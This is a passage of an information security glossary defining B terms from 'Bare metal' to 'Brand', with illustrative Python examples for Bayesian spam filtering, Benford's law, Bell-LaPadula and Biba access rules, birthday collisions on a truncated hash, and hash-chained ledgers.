|
Bare
metal
|
Refers to the tangible computer hardware platform on which host operating systems,
including hypervisors,
run, as distinct from the virtual (simulated) hardware on which guest systems run
in a virtual system.
|
Base
measure
|
“Measure
defined in terms of an attribute and the method for quantifying it.
Note: a base measure is functionally independent of other measures” (ISO/IEC
15939:2007).
|
Baseline
security
|
The lowest permissible/acceptable
level or form of security in a given situation (such as a particular organisation, physical security
zone or data classification level,
or a genuine security
culture). Forms a sound platform, basis or foundation on which
additional security can be implemented where appropriate. May be documented in a baseline
security standard. [Baseline:] “Information and controls that
are used as a minimum implementation or starting point to provide a
consistent minimum standard of systems security and information assurance” (NZ information Security Manual).
|
Baseline
security standard
|
Corporate information
security standard
defining the ‘lowest common denominator’ controls i.e. the minimal
information security control requirements that are expected to be met or
exceeded in all circumstances unless formally declared exempt.
|
Base
station,
wireless base station
|
“Equipment that provides the connection between mobile
or cellular phones and the core communication network” (ISO/IEC 27033-6).
|
Bashdoor
|
See shellshock.
|
Basic
collection
|
CIA term for OSINT
including information
‘voluntarily disclosed’ by individuals. It is not clear what techniques are
or are not permitted to ‘encourage’ individuals to ‘volunteer’ information,
but at least the CIA acknowledges its use of both standard collection
and special
collection.
|
Battery
backup
|
Electronic devices
require electricity to operate normally, making them dependent on the power
supply and vulnerable
to power interruptions. For devices that are at all important, power
interruptions constitute a substantial risk, hence batteries are an important
form of control
to maintain services as long as necessary to restore the primary or standby
supply. Unfortunately, batteries bring their own risks (such as finite
capacities and lifetimes, leakage of corrosive chemicals, and explosions)
which must also be addressed. See also UPS.
|
Battlement
|
High walkway topping Medieval castle walls, usually crenelated,
from which defenders could fire arrows, spears, stones and pour boiling oil
on attackers
below.
|
Bayesian
|
Heuristic
technique based on probability
theory, originally developed by Thomas Bayes, sometimes used to identify
potential information
security events (such as spam
and malware).
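A minimal Bayesian (naive Bayes) spam filter of the kind referred to above, added here as an example; it is not code from the glossary or from any mail product. The eight training messages are constructed for the example, and the tokeniser, the add-one smoothing and the 0.5 decision threshold are choices made for it.

```python
import math
import re
from collections import Counter

# Constructed toy training corpus (not real mail): (text, is_spam)
TRAINING = [
    ("free money click here now to claim your prize", True),
    ("win cash now, click the link for your free prize", True),
    ("cheap meds, free shipping, order now", True),
    ("urgent: verify your account, click here", True),
    ("agenda for tomorrow's project meeting attached", False),
    ("please review the attached quarterly report", False),
    ("lunch on friday? let me know what time works", False),
    ("minutes from the security steering meeting", False),
]

TOKEN = re.compile(r"[a-z0-9']+")


def tokenize(text):
    """Lower-case word tokens; punctuation is dropped."""
    return TOKEN.findall(text.lower())


class NaiveBayesSpamFilter:
    """Multinomial naive Bayes over word tokens with Laplace (add-one) smoothing."""

    def __init__(self, training):
        self.word_counts = {True: Counter(), False: Counter()}
        self.doc_counts = {True: 0, False: 0}
        for text, is_spam in training:
            self.doc_counts[is_spam] += 1
            self.word_counts[is_spam].update(tokenize(text))
        self.vocabulary = set(self.word_counts[True]) | set(self.word_counts[False])
        self.total_words = {cls: sum(self.word_counts[cls].values()) for cls in (True, False)}

    def _log_score(self, tokens, cls):
        """log P(class) + sum of log P(token | class); unseen tokens are smoothed, not skipped."""
        n_docs = self.doc_counts[True] + self.doc_counts[False]
        score = math.log(self.doc_counts[cls] / n_docs)
        denominator = self.total_words[cls] + len(self.vocabulary) + 1
        for tok in tokens:
            score += math.log((self.word_counts[cls][tok] + 1) / denominator)
        return score

    def spam_probability(self, text):
        """P(spam | text), computed from the two log scores without underflow."""
        tokens = tokenize(text)
        log_spam = self._log_score(tokens, True)
        log_ham = self._log_score(tokens, False)
        return 1.0 / (1.0 + math.exp(log_ham - log_spam))


FILTER = NaiveBayesSpamFilter(TRAINING)


def is_spam(text, threshold=0.5):
    """Classify one message against the toy model."""
    return FILTER.spam_probability(text) >= threshold


if __name__ == "__main__":
    for msg in ("free money, click here now", "please send the meeting minutes and the attached report"):
        print(f"{FILTER.spam_probability(msg):.3f}  {msg}")
```

The weakness a practitioner should know about is ‘Bayesian poisoning’: because every token contributes to the score, a spammer can pad a message with ordinary business vocabulary to drag the probability below the threshold, which is why production filters combine word statistics with other signals (sender reputation, URL and attachment checks) rather than relying on the text alone.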
|
Bell-LaPadula
model
|
Formal model or
architecture developed by David Elliott Bell and Leonard J. LaPadula in 1973 that
applies strict (mandatory) access control rules (usually summarised as ‘no read up, no
write down’ – the converse of the Biba model) and other constraints (such as the tranquillity principle) to maintain data confidentiality. Subjects (generally processes acting for users) can neither read objects (generally
data) at a higher level of classification than their own clearance (the simple security property) nor write to objects
at lower classification levels in the hierarchy (the *-property), so classified data cannot leak downwards.
|
BEC
(Business Email Compromise), EAC
(Email Account Compromise),
“bogus boss”,
“bogus invoice”,
MITE (Man-In-The-Email)
|
Extremely lucrative type of social engineering attack involving misuse or falsification
of email
addresses, accounts or systems
(e.g. through hacking,
spyware or
simply faking email sender addresses) to scam or defraud victims. There are many variants, for
example masquerading
as a manager or supplying a false invoice in order to trick an accounts clerk
to change the payee’s bank account, diverting funds into the fraudster’s money laundering
mechanisms. See also VEC.
|
Benford’s
law
|
Physicist Frank Benford (following an earlier observation by Simon Newcomb) realized that in naturally
occurring sets of numbers spanning several orders of magnitude (such as the values of corporate expense claims)
the leading digits are unevenly distributed: the most significant (leftmost) digit is 1 about 30% of the time
and 9 under 5% of the time, the expected proportion for digit d being log10(1 + 1/d).
Statistical analyses and forensic accounting tools compare observed leading-digit frequencies against this expectation
to identify data subsets with anomalous
distributions, such as expense claims by a particular worker that might have been
systematically and fraudulently
manipulated or fabricated (people inventing numbers tend to spread them fairly evenly).
Only applies to data that is neither artificially bounded nor assigned: invoice numbers, fixed fees and capped claims do not conform.
One of several techniques for identifying
patterns, correlations, anomalies and exceptions in databases according to the nature and
distribution of the data (metadata).
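A Benford first-digit test of the kind described, added here as an example and not taken from the glossary or from any forensic accounting product. The two data sets are constructed for the example: ‘honest’ claims spread evenly across three orders of magnitude (which is Benford-like by construction) and ‘fabricated’ claims invented just under a hypothetical 1000 approval threshold; the chi-square critical value is the standard table value for 8 degrees of freedom at p = 0.01.

```python
import math
import random
from collections import Counter


def benford_expected(digit):
    """Expected share of numbers whose leading digit is `digit` (1-9) under Benford's law."""
    return math.log10(1 + 1 / digit)


def leading_digit(value):
    """First significant digit of a non-zero number, read off its scientific notation ('1.23e+02' -> 1)."""
    return int(f"{abs(value):e}"[0])


def leading_digit_counts(values):
    """Count leading digits 1-9, ignoring zeros (which have no significant digit)."""
    return Counter(leading_digit(v) for v in values if v != 0)


def benford_chi_square(values):
    """Chi-square statistic of the observed leading-digit counts against Benford's expectation."""
    counts = leading_digit_counts(values)
    n = sum(counts.values())
    stat = 0.0
    for d in range(1, 10):
        expected = n * benford_expected(d)
        stat += (counts[d] - expected) ** 2 / expected
    return stat


# Critical value of the chi-square distribution with 8 degrees of freedom at p = 0.01
CHI2_CRITICAL_8DF_P01 = 20.09


def looks_fabricated(values, critical=CHI2_CRITICAL_8DF_P01):
    """Flag a set of claim values whose leading digits deviate from Benford beyond `critical`."""
    return benford_chi_square(values) > critical


def audit_claims_by_worker(claims_by_worker):
    """Return the workers (hypothetical names) whose claim values fail the Benford check."""
    return [worker for worker, values in claims_by_worker.items() if looks_fabricated(values)]


# Constructed sample data, not real claims:
# 900 honest claims spaced evenly in log scale from ~1 to 1000, which follows Benford by construction
HONEST_CLAIMS = [round(10 ** (i / 300), 2) for i in range(1, 901)]
# 300 fabricated claims, all invented 'just under' a hypothetical 1000 approval threshold
_rng = random.Random(7)
FABRICATED_CLAIMS = [round(_rng.uniform(700, 999), 2) for _ in range(300)]


if __name__ == "__main__":
    for name, data in (("honest", HONEST_CLAIMS), ("fabricated", FABRICATED_CLAIMS)):
        print(f"{name}: chi-square = {benford_chi_square(data):.1f}, flagged = {looks_fabricated(data)}")
```

The check only raises a flag for a closer look: a worker whose job genuinely involves many similar-sized purchases will also fail it, which is why the test is applied per subset and followed by human review rather than treated as proof of fraud.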
|
Benign
|
Harmless or helpful, having beneficial or
negligible/neutral intent or consequences. Cf. malicious.
|
Best Current Practice
(BCP)
|
Internet Engineering Task Force’s description of a de
facto level of performance, security
etc. Serially-numbered and occasionally updated BCPs are used to document
evolving or dynamically changing practices for which static standards are
impracticable or inappropriate. Cf. Business Continuity Plan.
|
Best
evidence
|
The forensic
evidence originally gathered or seized from the scene of a crime
and destined to be presented in court (e.g. the defendant’s
computer) rather than forensic
copies made for forensic investigation purposes (e.g. bit-copies of
the computer hard drive). Evidence is considered ‘best’ if there is none
better. Although forensic copies may sometimes be presented in court for
various reasons (e.g. if the best evidence has unfortunately gone
missing or degraded in storage), and a bit copy whose cryptographic hash matches the
original and whose chain of custody is documented is routinely accepted for digital evidence,
they carry slightly less weight than the best evidence.
|
Best
practice
|
By convention or common agreement, the ultimate approach.
However, since security
controls are often highly context-dependent, so-called best
practices may be inappropriate, inadequate or even detrimental in any given
situation, hence good
practice is the better term.
|
BHO
(Browser Helper Object)
|
Program that loads and runs automatically when Internet
Explorer is launched. Some BHOs are malicious i.e. malware.
|
Biba
model
|
Formal model or
architecture developed by Kenneth J. Biba in 1975 that applies strict (mandatory) access control rules (usually summarised as ‘no read down, no write up’ – the converse of
the Bell–LaPadula model) to maintain data integrity. Subjects (generally programs or systems) can neither modify higher-integrity objects (generally data)
nor read, and so be contaminated by, lower-integrity objects or subjects in the hierarchy, ensuring that trusted data is never derived from untrusted sources.
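The two rule sets side by side, as an added example serving both the Bell-LaPadula and Biba entries (this is illustrative code, not taken from either paper or from any operating system). The label names, the separate confidentiality and integrity lattices, and the hypothetical users and objects in `demo()` are assumptions for the example; the Bell-LaPadula variant shown allows writing upwards (a ‘blind write’), as in the original model.

```python
from enum import IntEnum


class Classification(IntEnum):
    """Confidentiality labels for Bell-LaPadula; higher value = more sensitive (hypothetical scheme)."""
    UNCLASSIFIED = 0
    CONFIDENTIAL = 1
    SECRET = 2
    TOP_SECRET = 3


class Integrity(IntEnum):
    """Integrity labels for Biba; higher value = more trusted (hypothetical scheme)."""
    UNTRUSTED = 0
    USER = 1
    SYSTEM = 2


def blp_permits(subject, obj, op):
    """Bell-LaPadula: no read up (simple security property), no write down (*-property)."""
    if op == "read":
        return subject >= obj
    if op == "write":
        return subject <= obj
    raise ValueError(f"unknown operation {op!r}")


def biba_permits(subject, obj, op):
    """Biba: no read down, no write up (the dual of Bell-LaPadula, protecting integrity)."""
    if op == "read":
        return subject <= obj
    if op == "write":
        return subject >= obj
    raise ValueError(f"unknown operation {op!r}")


class ReferenceMonitor:
    """Mediates every access under one policy and keeps an audit trail of the decisions."""

    def __init__(self, policy):
        self.policy = policy
        self.audit = []

    def access(self, who, subject_label, what, object_label, op):
        decision = self.policy(subject_label, object_label, op)
        self.audit.append((who, op, what, "granted" if decision else "denied"))
        return decision


def demo():
    """Run a few hypothetical requests through each policy and return the combined audit trail."""
    blp = ReferenceMonitor(blp_permits)
    blp.access("analyst", Classification.SECRET, "secret_report", Classification.SECRET, "read")      # granted
    blp.access("analyst", Classification.SECRET, "ts_cable", Classification.TOP_SECRET, "read")       # denied: read up
    blp.access("analyst", Classification.SECRET, "public_wiki", Classification.UNCLASSIFIED, "write") # denied: write down
    biba = ReferenceMonitor(biba_permits)
    biba.access("installer", Integrity.SYSTEM, "vendor_download", Integrity.UNTRUSTED, "read")      # denied: read down
    biba.access("installer", Integrity.SYSTEM, "user_profile", Integrity.USER, "write")              # granted: write down
    return blp.audit + biba.audit


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

Note that the two policies pull in opposite directions: a subject cleared high enough to read everything under Bell-LaPadula is, under Biba, the one least permitted to consume untrusted input, which is why real systems that need both keep the two lattices separate rather than reusing one set of labels.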
|
Big
data
|
Huge
(terabyte- to petabyte-scale and beyond), rapidly changing, highly complex data sets that cannot be processed adequately with conventional database applications and may require radically different approaches. Security-related
logs in large organisations approach this scale, where
conventional data analyses intended to spot impending security threats can take so long to complete that the incidents may have already happened by the time
they are reported. Term often misused by advertisers with a penchant for
hyperbole. See also UBA, SIEM, IDS/IPS and NTA.
|
Big
Brother
|
Name of the overbearing authoritarian establishment in
George Orwell’s dystopian novel “Nineteen eighty-four”. Euphemism for mass surveillance.
|
Binder
|
Hacker
term for a program that combines multiple executables within one program.
|
BIN
(Bank Identification
Number),
IIN
(Issuer Identification Number)
|
The first six digits (being extended to eight under ISO/IEC 7812) of a payment card number, identifying
the card issuer; hence a cracker
or carder
revealing several BINs is indicating that they hold card numbers for those
institutions.
|
Binding corporate rules
|
“Personal data protection policies which are adhered to
by a controller or processor established on the territory of a Member State
for transfers or a set of transfers of personal data to a controller or
processor in one or more third countries within a group of undertakings, or
group of enterprises engaged in a joint economic activity” (GDPR).
|
Biometric
|
Measurable physical or behavioural characteristic of a person, such as
their fingerprints, DNA profile, iris or retinal pattern, palm print, ear
shape, facial shape, voice pattern or vein pattern, or (behavioural biometrics) their signature, cursive writing or typing
dynamics, that can be used as a credential to identify and/or authenticate them. Unlike a password, a
biometric cannot be changed if it is compromised. Personal
information.
|
Biometric
data
|
“Personal data resulting from specific technical
processing relating to the physical, physiological or behavioural
characteristics of a natural person, which allow or confirm the unique
identification of that natural person, such as facial images or dactyloscopic
data” (GDPR).
|
BIOS
(Basic Input/Output System)
|
Low level firmware
used to interact with peripherals such as disks, keyboards and mice, complete
self-checks and initiate the operating
system boot sequence on a computer. Normally supplied with the
motherboard and stored on a ROM, EPROM, EEPROM or flash memory chip capable
of being updated or replaced. Deprecated
in favour of UEFI.
|
BIOS
password
|
Some BIOS
firmware
requires the user
to enter a password
to continue the boot sequence or access
a device. This
is meant to stop a casual thief from booting/accessing system resources, files etc. but
the control is
usually weak and easily defeated or bypassed by a competent hacker or forensics specialist (e.g. by resetting
the settings via a motherboard jumper or by removing the backup battery, by using a manufacturer’s recovery
password, or simply by moving the disk to another machine). It does nothing to protect the data on the disk:
full-disk encryption does that.
|
Birthday
paradox
|
Term reflecting the counterintuitive fact that, in a random group of at
least 23 people, it is ‘likely’ (i.e. the probability is greater
than 50%) that two of them celebrate their birthdays on the same day of the
year, because there are 253 pairs to consider rather than 22. The same mathematics underlies the
birthday attack in cryptanalysis: a collision (any two inputs with the same hash value)
can be found in roughly the square root of the number of possible outputs (about 2^(n/2) trials for an
n-bit hash), which is why a hash function’s collision resistance is only half its output length in bits.
More generally, any situation where a match between any value from one set against any
value from another set is considered significant (e.g. discovering
any valid password in an
entire password file) is far easier than finding a match to a
given value (e.g. finding the password for a particular user ID). A valid
concern if all entries in a fingerprint
database are scanned
for any cross-matches as opposed to scanning a particular set of prints from
a crime scene or suspect against the database.
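The birthday bound and a birthday attack carried out on a deliberately shortened hash, as an added example that is not part of the glossary. SHA-256 truncated to its top 32 bits stands in for a weak short hash (the truncation, the message format and the search limits are assumptions for the example); the preimage search is included for contrast, since finding a message matching one given value is a different and much harder problem.

```python
import hashlib
import math


def collision_probability(draws, space):
    """Exact probability that at least two of `draws` uniform picks from `space` values coincide."""
    p_all_distinct = 1.0
    for i in range(draws):
        p_all_distinct *= (space - i) / space
    return 1.0 - p_all_distinct


def draws_for_even_odds(space):
    """Approximate number of draws giving a 50% collision chance: sqrt(2 ln2 * space), about 1.18 * sqrt(space)."""
    return math.ceil(math.sqrt(2 * math.log(2) * space))


def short_hash(data, bits):
    """SHA-256 truncated to its top `bits` bits, standing in for a hash with a small output space."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def find_collision(bits, limit=2_000_000):
    """Birthday attack: hash distinct messages until two share a value.

    Returns (message1, message2, hashes_tried). Expected work is about 2**(bits/2), not 2**bits,
    because every new hash is compared against all the ones already seen.
    """
    seen = {}
    for i in range(limit):
        msg = f"message-{i}".encode()  # constructed inputs; any distinct inputs would do
        h = short_hash(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg
    return None


def find_preimage(target, bits, limit=2_000_000):
    """For contrast: search for a message hashing to one given value (expected work about 2**bits)."""
    for i in range(limit):
        msg = f"candidate-{i}".encode()
        if short_hash(msg, bits) == target:
            return msg, i + 1
    return None


if __name__ == "__main__":
    print(f"23 people: {collision_probability(23, 365):.3f}, 22 people: {collision_probability(22, 365):.3f}")
    m1, m2, tried = find_collision(32)
    print(f"32-bit collision after {tried} hashes (~2**{math.log2(tried):.1f}): {m1!r} vs {m2!r}")
```

Run it and the collision on the 32-bit hash typically appears after a few tens of thousands of hashes, whereas a preimage of a specific 32-bit value would need on the order of two billion; this is the arithmetic behind treating a 128-bit hash as offering only 64 bits of collision resistance.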
|
Bit-bucket,
sinkhole
|
Notional device
or network
address to which unwanted data/traffic
can be sent and discarded. Antivirus
researchers and law enforcement sometimes ‘sinkhole’ malware by registering, seizing or redirecting the
domain names it uses for command-and-control, so that infected machines report to a server the defenders
control rather than to the criminals, revealing the scale of the infection and cutting off the flow of stolen data. See also blackhole.
|
BitPaymer
|
One of several species
of ransomware
in the wild in
2019 that strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys. Targets medium to
large organisations,
demanding ransoms
between ~$50k and ~$1m.
|
Bitwise
image,
bit copy
|
A bit-by-bit identical image copy of all readable information on
a storage medium
that includes not only conventional data
content but also metadata,
alternate data streams (on NTFS) and the unallocated space between data files and
beyond the end-of-file markers (‘slack space’).
Normally used for forensic purposes, taken through a write-blocker and verified with a cryptographic hash
(e.g. SHA-256) of both the original medium and the image so that the copy can be shown to be unaltered.
May include remnants of data
left behind after files have been deleted or moved, and perhaps
(using special forensic techniques and/or hardware) data from disk sectors marked
unreadable by the firmware
or disk operating system.
|
Black
bag ops,
black bag operations
|
Covert
activities to penetrate,
infiltrate
or otherwise physically
compromise a target’s premises in
order to capture useful intelligence,
filling the notional swag bag. See also black ops.
|
Black
hat
|
Malicious,
self-serving, unethical
hacker or cracker. Cf. grey hat and white hat.
|
Blackhole
|
List (usually queried via DNS, hence ‘DNS blackhole list’, DNSBL, or ‘real-time blackhole list’, RBL) of the IP addresses of email
servers believed
to be pumping out spam,
used as a crude form of spam filtering (‘crude’ in that it tars all users of those servers
with the same broad brush).
|
Blacklist
|
List of email
addresses, email servers
(see blackhole),
URLs (see bit-bucket),
people, apps etc.
that management
deems unacceptable, banned or barred. Since the default action for unlisted
items is usually to permit
their access or
use, this control
fails open (insecure): anything new or unknown is allowed until someone notices it and adds it to the list.
“A list of email senders who have previously sent spam to a user” (NIST SP800-114 rev1). Cf. whitelist.
|
Blackmail
|
Form of coercion
or extortion
used to force someone into doing something inappropriate, illegal or simply
against their will, for example by threatening to reveal some embarrassing
corporate or personal
secret (perhaps a previous criminal act or sexual proclivity) if they do not comply with the
blackmailer’s instructions. See also sextortion.
|
Black
market,
criminal underground
|
Unofficial, covert,
unregulated and untaxed commercial market for stolen property (both physical
and intellectual)
plus the knowledge,
tools, processes
(such as money laundering) and other resources of the criminal fraternity.
See also hacker
underground, Darknet
and Silk Road.
|
Black
ops
|
Covert
(‘blacked-out’) activities normally run by government-sponsored or state
security services to infiltrate,
undermine or otherwise compromise
an adversary,
in a manner that permits
them plausibly to deny the existence, knowledge or sponsorship of the
operation, typically because it is unethical or illegal. See also black bag ops.
|
Blackout,
power cut
|
Extended interruption to the power feed. Computers and
other electronic systems
without alternative power sources such as battery-backup, UPS or standby generators, will of course
fail in a blackout, potentially corrupting vital system or data files in the process as well as
interrupting services. See also dip,
brownout, surge and spike.
|
BlackPOS
|
Species
of POS
memory-scraping malware in the wild, harvesting payment card data from the memory of point-of-sale
terminals in the brief interval before it is encrypted. Used to compromise the
US retailer Target in late 2013.
|
Blackshades
|
Species
of malware:
a remote access Trojan (RAT) sold openly for around $40 as a ‘remote administration tool’
until the criminal operation behind it was shut down in an FBI-led international action in 2014.
|
Black
swan event
|
Outlier/extreme/rare event which is so unusual that it
could not reasonably have been predicted using risk analysis processes and models. Metaphorical term
coined by Nassim Nicholas Taleb, originally in connection with financial management but
later applied across other fields. We humans find it difficult to even
contemplate, let alone deal rationally with black swans. Many of us struggle
even to take credible worst
case scenarios seriously.
|
Blaster
|
Infamous network
worm from 2003 that exploited a buffer overflow in the Windows RPC/DCOM service (patched in
MS03-026) to spread without any user action, crashing and rebooting unpatched machines.
|
Bleichenbacher
|
Name of a Swiss cryptographer who in 1998 devised an adaptive chosen-ciphertext (padding oracle) attack on RSA PKCS#1
v1.5 encryption as used for key exchange in SSL/TLS.
By sending the server around a million carefully chosen ciphertexts and observing whether it reports the
message padding as valid, the attacker recovers the plaintext of a captured ciphertext (e.g. the TLS pre-master secret)
without ever learning the private key. Variants (such as ROBOT, 2017) keep reappearing wherever an
implementation leaks the result of the padding check through error messages or timing.
|
Blended
threat,
blended attack
|
Form of attack
that combines methods,
for instance using social
engineering to dupe a target
into unwittingly infecting
their system with
malware.
|
Bletchley
Park
|
From 1938 until the end of World War II, this manor house
and grounds at Bletchley (now part of Milton Keynes, north-west of London) housed the top-secret UK Government
Code and Cypher School. Alan Turing, Gordon Welchman and colleagues designed the Bombe machines used to
break German Enigma traffic, while Tommy Flowers built Colossus, the first programmable electronic computer,
to break the German Lorenz (‘Tunny’) teleprinter cipher. Now a fascinating museum.
|
Bloatware
|
Software
that has become ‘bloated’ through the incremental addition of marginally
useful functions and features, making it more complex and less secure (more vulnerable)
as a consequence.
|
Block
|
(a) To prevent something from taking place. (b) Unit of data, either of a
fixed size (so many bits, bytes or characters) or delineated by specific
marker sequences, characters etc. (c) “Unit in which data is
stored and retrieved on disk and tape devices” (ISO/IEC 27040).
|
Blockchain
|
Distributed data
architecture used to establish an auditable, high-integrity record of changes to data: entries are grouped into
blocks, each of which contains a cryptographic hash of its predecessor, so that altering any past entry
changes every subsequent hash and is immediately detectable by anyone holding a copy of the chain.
Individual transactions are authorised by digital signatures, and new blocks are accepted by consensus among
the participants (e.g. proof of work) rather than by a trusted
authority.
Commonly applied in cryptocurrencies such as Bitcoin.
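A minimal hash chain showing the tamper-evidence property just described, added here as an example; it is not code from any blockchain project. The three ledger entries are constructed, the block layout and canonical JSON encoding are choices for the example, and transaction signatures and consensus are deliberately omitted so that the effect of the hash links alone is visible.

```python
import copy
import hashlib
import json

GENESIS_PREV = "0" * 64  # the first block links to an all-zero hash


def block_hash(block):
    """SHA-256 over a canonical (sorted-key, compact) JSON encoding of the block's linked fields."""
    payload = {"index": block["index"], "prev_hash": block["prev_hash"], "data": block["data"]}
    encoded = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(encoded).hexdigest()


def append_block(chain, data):
    """Append a block whose prev_hash commits to the current head of the chain."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS_PREV
    block = {"index": len(chain), "prev_hash": prev_hash, "data": data}
    block["hash"] = block_hash(block)
    chain.append(block)
    return block


def verify_chain(chain):
    """Return (True, None) if every block's hash and link is intact, else (False, index of first bad block)."""
    for i, block in enumerate(chain):
        expected_prev = GENESIS_PREV if i == 0 else chain[i - 1]["hash"]
        if block["index"] != i or block["prev_hash"] != expected_prev:
            return False, i
        if block["hash"] != block_hash(block):
            return False, i
    return True, None


def build_ledger(entries):
    chain = []
    for entry in entries:
        append_block(chain, entry)
    return chain


def tamper(chain, index, new_data, recompute_hash=False):
    """Copy of the chain with one entry altered, optionally with that block's own hash fixed up by the attacker."""
    forged = copy.deepcopy(chain)
    forged[index]["data"] = new_data
    if recompute_hash:
        forged[index]["hash"] = block_hash(forged[index])
    return forged


# Constructed sample ledger entries (hypothetical parties, not real transactions)
SAMPLE_ENTRIES = [
    {"from": "treasury", "to": "alice", "amount": 50},
    {"from": "alice", "to": "bob", "amount": 20},
    {"from": "bob", "to": "carol", "amount": 5},
]


if __name__ == "__main__":
    ledger = build_ledger(SAMPLE_ENTRIES)
    print("intact:", verify_chain(ledger))
    forged = tamper(ledger, 1, {"from": "alice", "to": "bob", "amount": 2000}, recompute_hash=True)
    print("block 1 altered and re-hashed:", verify_chain(forged))
```

Two things the run makes obvious: fixing up the altered block’s own hash only moves the failure to the next block, whose `prev_hash` no longer matches; and altering the final block and re-hashing it verifies cleanly, because nothing yet commits to it. The hash links therefore protect history, not the tail, which is why a block is treated as settled only once enough later blocks have been built on top of it and why the page’s point about consensus replacing a trusted authority matters.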
|
Block
cypher
|
Symmetric
encryption algorithm that encrypts a fixed-size block of plaintext
bits (e.g. 128 bits for AES) at a time. Messages longer than one block are handled by a mode of
operation, and a poor choice (such as ECB, which encrypts identical plaintext blocks to identical
ciphertext blocks) leaks patterns even with a strong cipher. Cf. stream cypher.
|
Blooper
|
Embarrassing and often humorous human error. Variously known as a bailout,
balls-up, bloomer, blunder, boner, booboo, boob, botch, bungle, bust-up,
clanger, corpsing, gaffe, foul-up, fumble, faux
pas, goof-up, howler, mistake, screw‑up, snafu, Spoonerism, wipeout
etc. An accidental integrity
failure.
|
Blue-
|
Prefix in the terms that follow, implying the exploitation of Bluetooth
connections, with or without the device
owner’s authorisation
and/or knowledge.
|
BlueBorne
|
A set of eight vulnerabilities in the Bluetooth implementations of Android, Linux, Windows and iOS,
disclosed by Armis in 2017, several of which allowed remote code execution or
man-in-the-middle attacks over the air without pairing or any user interaction.
Estimated at the time to affect over five billion devices.
|
Bluebugging
|
The covert
exploitation of
security vulnerabilities
in someone’s Bluetooth equipment to bug
them, for example by surreptitiously causing a compromised Bluetooth cellphone to call another
number and so transmit private
conversations in the vicinity of the compromised device.
|
Bluejacking
|
Sending unsolicited messages (e.g. spam, originally as vCard contact entries) to a nearby Bluetooth device. While that
may be annoying, it is essentially harmless in itself; the term is sometimes stretched to cover the
more sinister Bluesnarfing, Bluespying or Bluebugging attacks that involve
hijacking (taking control
of) the victim’s
device.
|
Bluesnarfing
|
Hacking
a Bluetooth device, violating
the user’s privacy and
potentially compromising
confidential
personal
and/or proprietary
data such as email or SMS/TXT
messages, contact details, diaries, photos/videos etc. stored on the
device.
|
Bluespying
|
Type of hacker
attack that exploits security vulnerabilities
on Bluetooth
equipment to spy
on the user, for
example accessing
stored GPS data to determine
where they have been.
|
Blue
team
|
The defensive team, tasked with protecting the enterprise
(or at least its flags)
against mock assaults by outsmarting the red team. See also purple and white team.
|
Bluetooth
|
Wireless networking
protocol
intended for short-range use (nominally about 10 metres for typical Class 2 devices, up to 100 metres for
Class 1), e.g. to connect a wireless headset to a mobile phone, but often accessible over longer
distances with a directional antenna, especially with higher-power Bluetooth systems built-in to some laptops and
vehicles, and things.
Early versions of Bluetooth were notoriously insecure but even current
versions have issues. “Wireless technology standard for exchanging data
over short distances. Note: ‘Bluetooth’ is a trademark owned by the Bluetooth
SIG.” (ISO/IEC
27033-6). See also ZigBee.
|
Bluff
ransomware,
bluffware
|
Malware
that gives the appearance of having encrypted or otherwise blocked access to the users’ data in order to extort a ransom payment out of naïve victims, but in
reality is simply displaying the message (which typically warns against
further checks by threatening to destroy the data). A form of scareware, a social engineering
incident.
|
Board
of Directors
(the Board)
|
The most senior level of management within the organisation
with overarching accountability
for protecting
and legitimately
exploiting the organisation’s assets
on behalf of its owners
or other stakeholders.
The Board typically delegates responsibility
for corporate governance
including information
security to Officers such as the Executives, retaining a strategic oversight rôle.
|
Body
cam[era], bodycam
|
Portable CCTV
camera worn on or about a person, recording the activities of people around
or interacting with the wearer. The police are increasingly using body
cameras both to record valuable evidence
from scenes of crime and to exonerate themselves if accused of excessive
violence etc. Miniature cameras can be used for covert surveillance (i.e. spying) as well as
for more mundane activities such as recording extreme sports. See also dash cam.
|
Body language
|
See non-verbal
communication.
|
Boiler
room
|
Fraud
involving heavy promotion of over-valued or non-existent stocks and shares by
bogus stockbrokers promising big investment returns to naïve investors.
|
Bollard
|
Strong post mounted firmly in the ground, intended to
reduce the risk of
vehicular attacks
on a facility. A physical
security control.
|
Boot
sector virus
|
Form of malware
that infects
the boot sector or Master Boot Record (MBR) of a disk, i.e. the part of
the disk read
first by the firmware (BIOS) in order to load the bootloader and hence the operating system and so
start up the computer. The virus therefore runs before the operating system and before most security software,
including old/basic antivirus
programs which execute only after the operating system has
started (modern antivirus programs load and execute at the earliest
opportunity, and UEFI Secure Boot is designed to refuse to run unsigned boot code at all).
|
Booter
|
See stresser.
|
Bot,
zombie
|
Short for ‘robot’. (a) Networked computer under the remote control of hackers, often compromised
using Trojans.
The owner of the
computer usually remains oblivious to the compromise. Often corralled
together in botnets.
Also known as a zombie, as in the ‘living dead’ of Hammer horror fame.
(b) Any autonomous piece of software
capable of roaming systems
and/or networks, whether for benign
(e.g. indexing Web pages for search engines) or malicious (e.g. spyware) purposes.
|
Bot
master, botmaster
|
Hacker
or cracker who commands and
controls a botnet.
|
Botnet
|
Networks
of bots that are
used for hacking/criminal
activities such as spamming,
identity theft,
carrying out DDoS attacks or as launch
pads for attacking other systems. Botnets comprising hundreds or thousands of compromised
machines are rented out to hackers
on the black market.
|
Botware
|
Malware
used to command
and control a bot,
for example allowing the bot
master to download, install and run a code module for a particular
type of network attack.
|
Bounced
|
Emails
that are undeliverable for some reason (e.g. addressee unknown)
may be returned with an explanatory note (“bounced”) or silently deleted –
the former approach helps senders but gives spammers clues about the status of email
addresses.
|
Bouncer
|
See security
guard.
|
Boundary
|
Demarcation between zones, typically where private property
abuts public land or someone else’s private property, or private networks abut
public networks, or the edge of someone’s personal space. Alternatively, the
values or other parameters that distinguish valid from invalid data. See also perimeter.
|
BRAIN.A
|
Widely held to have been the first personal computer virus, created in
1986 as a proof-of-concept by two Pakistani geeks who subsequently set up an
ISP called Brain Communications. Spread on floppy disks. Strictly speaking,
it was not a true virus since it did not attach itself to executable
programs, and it was pre-dated by viruses on other platforms such as Creeper
(DEC PDP-10, 1971), ANIMAL/PERVADE (Univac, 1974) and Elk Cloner (Apple II,
1981).
|
Brand
|
The set of commonly-held perceptions, values and beliefs
in the minds of prospects and customers about an organisation and/or its products (goods
